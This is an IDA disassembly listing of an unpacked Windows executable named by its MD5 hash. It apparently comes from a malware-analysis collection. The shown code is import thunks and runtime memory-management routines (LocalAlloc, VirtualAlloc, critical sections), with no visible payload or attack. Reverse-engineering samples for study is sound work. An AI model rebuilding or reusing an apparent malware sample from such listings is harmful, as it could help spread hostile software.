;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 8A425894CAE3C115C7D61E3F350D206D
; File Name : u:\work\8a425894cae3c115c7d61e3f350d206d_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00004B44 ( 19268.)
; Section size in file : 00004B44 ( 19268.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
CODE segment para public 'CODE' use32
assume cs:CODE
;org 401000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
off_401000 dd offset dword_401004 ; DATA XREF: CODE:00403E80�o
dword_401004 dd 79420401h, 16574h, 0FF000000h, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401014 proc near ; CODE XREF: sub_402F9C+39�p
; sub_402F9C+54�p
jmp ds:dword_408108
sub_401014 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40101C proc near ; CODE XREF: sub_402998+14�p
; sub_4029B4+16�p ...
jmp ds:dword_408104
sub_40101C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401024 proc near ; CODE XREF: sub_402E10-2B6�p
; CODE:00402D68�p
; DATA XREF: ...
jmp ds:dword_408100
sub_401024 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40102C proc near ; CODE XREF: sub_402E10-31E�p
; sub_402E10-2E1�p ...
jmp ds:dword_4080FC
sub_40102C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401034 proc near ; CODE XREF: sub_402F9C+3F�p
; sub_402F9C+5A�p
jmp ds:dword_4080F8
sub_401034 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40103C proc near ; CODE XREF: sub_4025B0+B�p
; sub_4025B0+37�p ...
jmp ds:dword_408118
sub_40103C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401044 proc near ; CODE XREF: sub_403028+BA�p
jmp ds:dword_4080F4
sub_401044 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40104C proc near ; CODE XREF: sub_402F9C+78�p
jmp ds:dword_408114
sub_40104C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401054 proc near ; CODE XREF: sub_403028+85�p
jmp ds:dword_4080F0
sub_401054 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40105C proc near ; CODE XREF: sub_40269C:loc_4026D2�p
; sub_403B88+67�p
jmp ds:dword_4080EC
sub_40105C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401064 proc near ; CODE XREF: sub_403AC0+26�p
jmp ds:dword_4080E8
sub_401064 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40106C proc near ; CODE XREF: sub_40269C+24�p
jmp ds:dword_4080E4
sub_40106C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401074 proc near ; CODE XREF: sub_4010BC+A�p
jmp ds:dword_4080E0
sub_401074 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40107C proc near ; CODE XREF: sub_403B88:loc_403C30�p
; sub_403B88:loc_403C41�p
jmp ds:dword_4080DC
sub_40107C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401084 proc near ; CODE XREF: sub_4028BC+6B�p
jmp ds:dword_408128
sub_401084 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40108C proc near ; CODE XREF: sub_4028BC+22�p
jmp ds:dword_408124
sub_40108C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401094 proc near ; CODE XREF: sub_4028BC+55�p
jmp ds:dword_408120
sub_401094 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40109C proc near ; CODE XREF: sub_4033F8+16�p
jmp ds:dword_408134
sub_40109C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010A4 proc near ; CODE XREF: sub_4033BC+E�p
; sub_4033D4+13�p
jmp ds:dword_408130
sub_4010A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010AC proc near ; CODE XREF: sub_403B88:loc_403C50�p
jmp ds:dword_4080D8
sub_4010AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010B4 proc near ; CODE XREF: sub_403B88+7B�p
; sub_403B88+8C�p
jmp ds:dword_4080D4
sub_4010B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4010BC proc near ; CODE XREF: sub_403B88+71�p
var_1C = word ptr -1Ch
var_18 = word ptr -18h
push ebx
add esp, 0FFFFFFBCh
mov ebx, 0Ah
push esp
call sub_401074 ; GetStartupInfoA
test byte ptr [esp+48h+var_1C], 1
jz short loc_4010D7
movzx ebx, [esp+48h+var_18]
loc_4010D7: ; CODE XREF: sub_4010BC+14�j
mov eax, ebx
add esp, 44h
pop ebx
retn
sub_4010BC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E0 proc near ; CODE XREF: sub_401120+13�p
; sub_4017AC+53�p
jmp ds:dword_4080D0
sub_4010E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E8 proc near ; CODE XREF: sub_401870+3F�p
; sub_401870+9D�p
jmp ds:dword_4080CC
sub_4010E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010F0 proc near ; CODE XREF: sub_4012C4+2F�p
; sub_401328+1E�p ...
jmp ds:dword_4080C8
sub_4010F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010F8 proc near ; CODE XREF: sub_4012C4+56�p
; sub_401328+69�p ...
jmp ds:dword_4080C4
sub_4010F8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401100 proc near ; CODE XREF: sub_4017AC+16�p
jmp ds:dword_4080C0
sub_401100 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401108 proc near ; CODE XREF: sub_4017AC+29�p
; sub_401870+2D�p ...
jmp ds:dword_4080BC
sub_401108 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401110 proc near ; CODE XREF: sub_4017AC+B0�p
; sub_401870+C6�p ...
jmp ds:dword_4080B8
sub_401110 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401118 proc near ; CODE XREF: sub_401870+D0�p
jmp ds:dword_4080B4
sub_401118 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401120 proc near ; CODE XREF: sub_401178+6�p
push ebx
push esi
mov esi, offset dword_4075D0
cmp dword ptr [esi], 0
jnz short loc_401166
push 644h
push 0
call sub_4010E0 ; LocalAlloc
mov ecx, eax
test ecx, ecx
jnz short loc_401143
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401143: ; CODE XREF: sub_401120+1C�j
mov eax, ds:dword_4075CC
mov [ecx], eax
mov ds:dword_4075CC, ecx
xor edx, edx
loc_401152: ; CODE XREF: sub_401120+44�j
mov eax, edx
add eax, eax
lea eax, [ecx+eax*8+4]
mov ebx, [esi]
mov [eax], ebx
mov [esi], eax
inc edx
cmp edx, 64h
jnz short loc_401152
loc_401166: ; CODE XREF: sub_401120+A�j
mov eax, [esi]
mov edx, [eax]
mov [esi], edx
pop esi
pop ebx
retn
sub_401120 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401170 proc near ; CODE XREF: sub_4017AC+33�p
; sub_4017AC+3D�p ...
mov [eax], eax
mov [eax+4], eax
retn
sub_401170 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401178 proc near ; CODE XREF: sub_4011C0+5D�p
; sub_401230+73�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
call sub_401120
test eax, eax
jnz short loc_40118C
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40118C: ; CODE XREF: sub_401178+D�j
mov edx, [esi]
mov [eax+8], edx
mov edx, [esi+4]
mov [eax+0Ch], edx
mov edx, [ebx]
mov [eax], edx
mov [eax+4], ebx
mov [edx+4], eax
mov [ebx], eax
mov al, 1
pop esi
pop ebx
retn
sub_401178 endp
; =============== S U B R O U T I N E =======================================
sub_4011A8 proc near ; CODE XREF: sub_4011C0+2C�p
; sub_4011C0+48�p ...
mov edx, [eax+4]
mov ecx, [eax]
mov [edx], ecx
mov [ecx+4], edx
mov edx, ds:dword_4075D0
mov [eax], edx
mov ds:dword_4075D0, eax
retn
sub_4011A8 endp
; =============== S U B R O U T I N E =======================================
sub_4011C0 proc near ; CODE XREF: sub_40156C+6C�p
; sub_4015FC+62�p ...
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov esi, ecx
mov [esp+14h+var_14], edx
mov ebp, eax
mov ebx, [ebp+0]
mov eax, [esp+14h+var_14]
mov edx, [eax]
mov [esi], edx
mov edx, [eax+4]
mov [esi+4], edx
loc_4011DC: ; CODE XREF: sub_4011C0+57�j
mov edi, [ebx]
mov eax, [esi]
mov edx, [ebx+8]
add edx, [ebx+0Ch]
cmp eax, edx
jnz short loc_4011FE
mov eax, ebx
call sub_4011A8
mov eax, [ebx+8]
mov [esi], eax
mov eax, [ebx+0Ch]
add [esi+4], eax
jmp short loc_401213
; ---------------------------------------------------------------------------
loc_4011FE: ; CODE XREF: sub_4011C0+28�j
add eax, [esi+4]
cmp eax, [ebx+8]
jnz short loc_401213
mov eax, ebx
call sub_4011A8
mov eax, [ebx+0Ch]
add [esi+4], eax
loc_401213: ; CODE XREF: sub_4011C0+3C�j
; sub_4011C0+44�j
mov ebx, edi
cmp ebp, ebx
jnz short loc_4011DC
mov edx, esi
mov eax, ebp
call sub_401178
test al, al
jnz short loc_40122A
xor eax, eax
mov [esi], eax
loc_40122A: ; CODE XREF: sub_4011C0+64�j
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4011C0 endp
; =============== S U B R O U T I N E =======================================
sub_401230 proc near ; CODE XREF: sub_401720+7A�p
; sub_401B08+99�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov ebx, eax
mov edi, ebx
loc_40123B: ; CODE XREF: sub_401230+88�j
mov esi, [edx]
mov eax, [ebx+8]
cmp esi, eax
jb short loc_4012B4
mov ecx, esi
add ecx, [edx+4]
mov ebp, eax
add ebp, [ebx+0Ch]
cmp ecx, ebp
ja short loc_4012B4
cmp esi, eax
jnz short loc_401271
mov eax, [edx+4]
add [ebx+8], eax
mov eax, [edx+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_4012B0
mov eax, ebx
call sub_4011A8
jmp short loc_4012B0
; ---------------------------------------------------------------------------
loc_401271: ; CODE XREF: sub_401230+24�j
mov ecx, esi
mov edi, [edx+4]
add ecx, edi
mov ebp, eax
add ebp, [ebx+0Ch]
cmp ecx, ebp
jnz short loc_401286
sub [ebx+0Ch], edi
jmp short loc_4012B0
; ---------------------------------------------------------------------------
loc_401286: ; CODE XREF: sub_401230+4F�j
mov ecx, [edx]
add ecx, [edx+4]
mov [esp+18h+var_18], ecx
mov edi, [ebx+8]
add edi, [ebx+0Ch]
sub edi, ecx
mov [esp+18h+var_14], edi
sub esi, eax
mov [ebx+0Ch], esi
mov edx, esp
mov eax, ebx
call sub_401178
test al, al
jnz short loc_4012B0
xor eax, eax
jmp short loc_4012BC
; ---------------------------------------------------------------------------
loc_4012B0: ; CODE XREF: sub_401230+36�j
; sub_401230+3F�j ...
mov al, 1
jmp short loc_4012BC
; ---------------------------------------------------------------------------
loc_4012B4: ; CODE XREF: sub_401230+12�j
; sub_401230+20�j
mov ebx, [ebx]
cmp edi, ebx
jnz short loc_40123B
xor eax, eax
loc_4012BC: ; CODE XREF: sub_401230+7E�j
; sub_401230+82�j
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401230 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4012C4 proc near ; CODE XREF: sub_40156C+5C�p
push ebx
push esi
push edi
mov ebx, edx
mov esi, eax
cmp esi, 100000h
jge short loc_4012DA
mov esi, 100000h
jmp short loc_4012E6
; ---------------------------------------------------------------------------
loc_4012DA: ; CODE XREF: sub_4012C4+D�j
add esi, 0FFFFh
and esi, 0FFFF0000h
loc_4012E6: ; CODE XREF: sub_4012C4+14�j
mov [ebx+4], esi
push 1
push 2000h
push esi
push 0
call sub_4010F0 ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jz short loc_401323
mov edx, ebx
mov eax, offset off_4075D4
call sub_401178
test al, al
jnz short loc_401323
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_4010F8 ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_401323: ; CODE XREF: sub_4012C4+3A�j
; sub_4012C4+4A�j
pop edi
pop esi
pop ebx
retn
sub_4012C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401328 proc near ; CODE XREF: sub_4015FC+4C�p
; sub_4015FC+93�p
push ebx
push esi
push edi
push ebp
mov ebx, ecx
mov esi, edx
mov ebp, eax
mov dword ptr [ebx+4], 100000h
push 4
push 2000h
push 100000h
push ebp
call sub_4010F0 ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jnz short loc_401372
add esi, 0FFFFh
and esi, 0FFFF0000h
mov [ebx+4], esi
push 4
push 2000h
push esi
push ebp
call sub_4010F0 ; VirtualAlloc
mov [ebx], eax
loc_401372: ; CODE XREF: sub_401328+29�j
cmp dword ptr [ebx], 0
jz short loc_40139A
mov edx, ebx
mov eax, offset off_4075D4
call sub_401178
test al, al
jnz short loc_40139A
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_4010F8 ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_40139A: ; CODE XREF: sub_401328+4D�j
; sub_401328+5D�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401328 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4013A0 proc near ; CODE XREF: sub_40156C+7E�p
; sub_4015FC+7A�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFECh
mov [esp+24h+var_20], ecx
mov [esp+24h+var_24], edx
mov [esp+24h+var_1C], 0FFFFFFFFh
xor edx, edx
mov [esp+24h+var_18], edx
mov ebp, eax
mov eax, [esp+24h+var_24]
add eax, ebp
mov [esp+24h+var_14], eax
mov ebx, ds:off_4075D4
jmp short loc_401420
; ---------------------------------------------------------------------------
loc_4013CF: ; CODE XREF: sub_4013A0+86�j
mov edi, [ebx]
mov esi, [ebx+8]
cmp ebp, esi
ja short loc_40141E
mov eax, esi
add eax, [ebx+0Ch]
cmp eax, [esp+24h+var_14]
ja short loc_40141E
cmp esi, [esp+24h+var_1C]
jnb short loc_4013ED
mov [esp+24h+var_1C], esi
loc_4013ED: ; CODE XREF: sub_4013A0+47�j
mov eax, esi
add eax, [ebx+0Ch]
cmp eax, [esp+24h+var_18]
jbe short loc_4013FC
mov [esp+24h+var_18], eax
loc_4013FC: ; CODE XREF: sub_4013A0+56�j
push 8000h
push 0
push esi
call sub_4010F8 ; VirtualFree
test eax, eax
jnz short loc_401417
mov ds:dword_4075B0, 1
loc_401417: ; CODE XREF: sub_4013A0+6B�j
mov eax, ebx
call sub_4011A8
loc_40141E: ; CODE XREF: sub_4013A0+36�j
; sub_4013A0+41�j
mov ebx, edi
loc_401420: ; CODE XREF: sub_4013A0+2D�j
cmp ebx, offset off_4075D4
jnz short loc_4013CF
mov eax, [esp+24h+var_20]
xor edx, edx
mov [eax], edx
cmp [esp+24h+var_18], 0
jz short loc_401450
mov eax, [esp+24h+var_20]
mov edx, [esp+24h+var_1C]
mov [eax], edx
mov eax, [esp+24h+var_18]
sub eax, [esp+24h+var_1C]
mov edx, [esp+24h+var_20]
mov [edx+4], eax
loc_401450: ; CODE XREF: sub_4013A0+95�j
add esp, 14h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4013A0 endp
; =============== S U B R O U T I N E =======================================
sub_401458 proc near ; CODE XREF: sub_40156C+2D�p
; sub_4015FC+E6�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov [esp+1Ch+var_18], ecx
mov [esp+1Ch+var_1C], edx
mov edx, eax
mov ebp, edx
and ebp, 0FFFFF000h
add edx, [esp+1Ch+var_1C]
add edx, 0FFFh
and edx, 0FFFFF000h
mov [esp+1Ch+var_14], edx
mov eax, [esp+1Ch+var_18]
mov [eax], ebp
mov eax, [esp+1Ch+var_14]
sub eax, ebp
mov edx, [esp+1Ch+var_18]
mov [edx+4], eax
mov esi, ds:off_4075D4
jmp short loc_4014DA
; ---------------------------------------------------------------------------
loc_40149E: ; CODE XREF: sub_401458+88�j
mov ebx, [esi+8]
mov edi, [esi+0Ch]
add edi, ebx
cmp ebp, ebx
jbe short loc_4014AC
mov ebx, ebp
loc_4014AC: ; CODE XREF: sub_401458+50�j
cmp edi, [esp+1Ch+var_14]
jbe short loc_4014B6
mov edi, [esp+1Ch+var_14]
loc_4014B6: ; CODE XREF: sub_401458+58�j
cmp edi, ebx
jbe short loc_4014D8
push 4
push 1000h
sub edi, ebx
push edi
push ebx
call sub_4010F0 ; VirtualAlloc
test eax, eax
jnz short loc_4014D8
mov eax, [esp+1Ch+var_18]
xor edx, edx
mov [eax], edx
jmp short loc_4014E2
; ---------------------------------------------------------------------------
loc_4014D8: ; CODE XREF: sub_401458+60�j
; sub_401458+74�j
mov esi, [esi]
loc_4014DA: ; CODE XREF: sub_401458+44�j
cmp esi, offset off_4075D4
jnz short loc_40149E
loc_4014E2: ; CODE XREF: sub_401458+7E�j
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401458 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4014EC proc near ; CODE XREF: sub_401720+2E�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ebx, eax
mov esi, ebx
add esi, 0FFFh
and esi, 0FFFFF000h
mov [esp+14h+var_14], esi
mov ebp, ebx
add ebp, edx
and ebp, 0FFFFF000h
mov eax, [esp+14h+var_14]
mov [ecx], eax
mov eax, ebp
sub eax, [esp+14h+var_14]
mov [ecx+4], eax
mov esi, ds:off_4075D4
jmp short loc_40155B
; ---------------------------------------------------------------------------
loc_401523: ; CODE XREF: sub_4014EC+75�j
mov ebx, [esi+8]
mov edi, [esi+0Ch]
add edi, ebx
cmp ebx, [esp+14h+var_14]
jnb short loc_401533
mov ebx, [esp+14h+var_14]
loc_401533: ; CODE XREF: sub_4014EC+42�j
cmp ebp, edi
jnb short loc_401539
mov edi, ebp
loc_401539: ; CODE XREF: sub_4014EC+49�j
cmp edi, ebx
jbe short loc_401559
push 4000h
sub edi, ebx
push edi
push ebx
call sub_4010F8 ; VirtualFree
test eax, eax
jnz short loc_401559
mov ds:dword_4075B0, 2
loc_401559: ; CODE XREF: sub_4014EC+4F�j
; sub_4014EC+61�j
mov esi, [esi]
loc_40155B: ; CODE XREF: sub_4014EC+35�j
cmp esi, offset off_4075D4
jnz short loc_401523
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4014EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40156C proc near ; CODE XREF: sub_401D18+B�p
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov esi, edx
mov edi, eax
mov ebp, offset off_4075E4
add edi, 3FFFh
and edi, 0FFFFC000h
loc_401588: ; CODE XREF: sub_40156C+75�j
mov ebx, [ebp+0]
jmp short loc_4015C0
; ---------------------------------------------------------------------------
loc_40158D: ; CODE XREF: sub_40156C+56�j
cmp edi, [ebx+0Ch]
jg short loc_4015BE
mov ecx, esi
mov edx, edi
mov eax, [ebx+8]
call sub_401458
cmp dword ptr [esi], 0
jz short loc_4015F3
mov eax, [esi+4]
add [ebx+8], eax
mov eax, [esi+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_4015F3
mov eax, ebx
call sub_4011A8
jmp short loc_4015F3
; ---------------------------------------------------------------------------
loc_4015BE: ; CODE XREF: sub_40156C+24�j
mov ebx, [ebx]
loc_4015C0: ; CODE XREF: sub_40156C+1F�j
cmp ebx, ebp
jnz short loc_40158D
mov edx, esi
mov eax, edi
call sub_4012C4
cmp dword ptr [esi], 0
jz short loc_4015F3
mov ecx, esp
mov edx, esi
mov eax, ebp
call sub_4011C0
cmp [esp+18h+var_18], 0
jnz short loc_401588
mov ecx, esp
mov edx, [esi+4]
mov eax, [esi]
call sub_4013A0
xor eax, eax
mov [esi], eax
loc_4015F3: ; CODE XREF: sub_40156C+35�j
; sub_40156C+47�j ...
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40156C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4015FC proc near ; CODE XREF: sub_401D44+10�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFECh
mov [esp+24h+var_24], ecx
mov edi, edx
mov esi, eax
mov ebp, offset off_4075E4
add edi, 3FFFh
and edi, 0FFFFC000h
loc_40161B: ; CODE XREF: sub_4015FC+6C�j
; sub_4015FC+B3�j
mov ebx, [ebp+0]
jmp short loc_401622
; ---------------------------------------------------------------------------
loc_401620: ; CODE XREF: sub_4015FC+2D�j
mov ebx, [ebx]
loc_401622: ; CODE XREF: sub_4015FC+22�j
cmp ebx, ebp
jz short loc_40162B
cmp esi, [ebx+8]
jnz short loc_401620
loc_40162B: ; CODE XREF: sub_4015FC+28�j
cmp esi, [ebx+8]
jnz short loc_401687
cmp edi, [ebx+0Ch]
jle loc_4016CF
lea ecx, [esp+24h+var_20]
mov edx, edi
sub edx, [ebx+0Ch]
mov eax, [ebx+8]
add eax, [ebx+0Ch]
call sub_401328
cmp [esp+24h+var_20], 0
jz short loc_401687
lea ecx, [esp+24h+var_18]
lea edx, [esp+24h+var_20]
mov eax, ebp
call sub_4011C0
cmp [esp+24h+var_18], 0
jnz short loc_40161B
lea ecx, [esp+24h+var_18]
mov edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
call sub_4013A0
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
jmp loc_401717
; ---------------------------------------------------------------------------
loc_401687: ; CODE XREF: sub_4015FC+32�j
; sub_4015FC+56�j
lea ecx, [esp+24h+var_20]
mov edx, edi
mov eax, esi
call sub_401328
cmp [esp+24h+var_20], 0
jz short loc_4016CF
lea ecx, [esp+24h+var_18]
lea edx, [esp+24h+var_20]
mov eax, ebp
call sub_4011C0
cmp [esp+24h+var_18], 0
jnz loc_40161B
lea ecx, [esp+24h+var_18]
mov edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
call sub_4013A0
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
jmp short loc_401717
; ---------------------------------------------------------------------------
loc_4016CF: ; CODE XREF: sub_4015FC+37�j
; sub_4015FC+9D�j
mov ebp, [ebx+8]
cmp esi, ebp
jnz short loc_401710
cmp edi, [ebx+0Ch]
jg short loc_401710
mov ecx, [esp+24h+var_24]
mov edx, edi
mov eax, ebp
call sub_401458
mov eax, [esp+24h+var_24]
cmp dword ptr [eax], 0
jz short loc_401717
mov eax, [esp+24h+var_24]
mov eax, [eax+4]
add [ebx+8], eax
mov eax, [esp+24h+var_24]
mov eax, [eax+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_401717
mov eax, ebx
call sub_4011A8
jmp short loc_401717
; ---------------------------------------------------------------------------
loc_401710: ; CODE XREF: sub_4015FC+D8�j
; sub_4015FC+DD�j
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
loc_401717: ; CODE XREF: sub_4015FC+86�j
; sub_4015FC+D1�j ...
add esp, 14h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4015FC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401720 proc near ; CODE XREF: sub_401B08+4E�p
; sub_401B08+61�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFECh
mov edi, ecx
mov [esp+20h+var_20], edx
lea ebx, [eax+3FFFh]
and ebx, 0FFFFC000h
mov esi, [esp+20h+var_20]
add esi, eax
and esi, 0FFFFC000h
cmp ebx, esi
jnb short loc_4017A1
mov ecx, edi
mov edx, esi
sub edx, ebx
mov eax, ebx
call sub_4014EC
lea ecx, [esp+20h+var_1C]
mov edx, edi
mov eax, offset off_4075E4
call sub_4011C0
mov ebx, [esp+20h+var_1C]
test ebx, ebx
jz short loc_40178A
lea ecx, [esp+20h+var_14]
mov edx, [esp+20h+var_18]
mov eax, ebx
call sub_4013A0
mov eax, [esp+20h+var_14]
mov [esp+20h+var_1C], eax
mov eax, [esp+20h+var_10]
mov [esp+20h+var_18], eax
loc_40178A: ; CODE XREF: sub_401720+49�j
cmp [esp+20h+var_1C], 0
jz short loc_4017A5
lea edx, [esp+20h+var_1C]
mov eax, offset off_4075E4
call sub_401230
jmp short loc_4017A5
; ---------------------------------------------------------------------------
loc_4017A1: ; CODE XREF: sub_401720+24�j
xor eax, eax
mov [edi], eax
loc_4017A5: ; CODE XREF: sub_401720+6F�j
; sub_401720+7F�j
add esp, 14h
pop edi
pop esi
pop ebx
retn
sub_401720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017AC proc near ; CODE XREF: sub_401E98+14�p
; sub_402028+19�p ...
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00402BB4 SIZE 00000036 BYTES
push ebp
mov ebp, esp
xor edx, edx
push ebp
push offset loc_401862
push dword ptr fs:[edx]
mov fs:[edx], esp
push offset dword_4075B4
call sub_401100 ; InitializeCriticalSection
cmp ds:byte_407035, 0
jz short loc_4017DA
push offset dword_4075B4
call sub_401108 ; RtlEnterCriticalSection
loc_4017DA: ; CODE XREF: sub_4017AC+22�j
mov eax, offset off_4075D4
call sub_401170
mov eax, offset off_4075E4
call sub_401170
mov eax, offset off_407610
call sub_401170
push 0FF8h
push 0
call sub_4010E0 ; LocalAlloc
mov ds:dword_40760C, eax
cmp ds:dword_40760C, 0
jz short loc_401841
mov eax, 3
loc_401817: ; CODE XREF: sub_4017AC+7D�j
mov edx, ds:dword_40760C
xor ecx, ecx
mov [edx+eax*4-0Ch], ecx
inc eax
cmp eax, 401h
jnz short loc_401817
mov eax, offset off_4075F4
mov [eax+4], eax
mov [eax], eax
mov ds:off_407600, eax
mov ds:byte_4075AC, 1
loc_401841: ; CODE XREF: sub_4017AC+64�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401869
loc_40184E: ; CODE XREF: sub_4017AC+BB�j
cmp ds:byte_407035, 0
jz short locret_401861
push offset dword_4075B4
call sub_401110 ; RtlLeaveCriticalSection
locret_401861: ; CODE XREF: sub_4017AC+A9�j
retn
; ---------------------------------------------------------------------------
loc_401862: ; DATA XREF: sub_4017AC+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_40184E
; ---------------------------------------------------------------------------
loc_401869: ; DATA XREF: sub_4017AC+9D�o
mov al, ds:byte_4075AC
pop ebp
retn
